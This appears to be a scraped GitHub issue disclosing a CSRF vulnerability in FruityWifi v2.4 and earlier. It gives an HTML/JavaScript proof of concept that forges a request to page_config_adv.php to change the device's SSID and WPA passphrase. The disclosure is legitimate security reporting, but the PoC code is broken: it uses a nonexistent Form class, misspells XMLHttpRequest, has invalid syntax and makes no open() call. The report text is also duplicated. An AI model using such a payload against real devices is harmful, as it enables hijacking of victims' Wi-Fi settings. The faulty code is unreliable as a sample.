You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
During the analysis of the product, it was observed that FruityWifi <=v2.4 is vulnerable to Cross-Site Request Forgery (CSRF) due to lack of CSRF protection in the page_config_adv.php endpoint. This allows an unauthenticated attacker to lure the victim to visit a website containing a CSRF Page resulting in the change of newSSID and hostapd_wpa_passphrase value as per the attacker's choice.
Steps to Reproduce
Generate an HTML Proof of Concept with the below content.
<html>
<head>
<script>
let url = "http://fruitywifi_ip:port/page_config_adv.php";
let form = new Form();
form.append("hostapd","0");
form.append("newSSID","hack");
form.append("hostapd_wpa_passphrase","hack");
let xhr = new XMlHttpRequest();
let xhr.WithCredentials = true;
xhr.send(form);
</script>
</head>
<body>
<h1>Hi Man</h1>
</body>
</html>
Once the victim will open this HTML file, a CSRF request will be triggered to the legitimate server allowing the change of newSSIF and hostapd_wpa_passphrase.
The text was updated successfully, but these errors were encountered:
Vulnerability Description
During the analysis of the product, it was observed that FruityWifi <=v2.4 is vulnerable to Cross-Site Request Forgery (CSRF) due to lack of CSRF protection in the
page_config_adv.phpendpoint. This allows an unauthenticated attacker to lure the victim to visit a website containing a CSRF Page resulting in the change ofnewSSIDandhostapd_wpa_passphrasevalue as per the attacker's choice.Steps to Reproduce
newSSIFandhostapd_wpa_passphrase.The text was updated successfully, but these errors were encountered: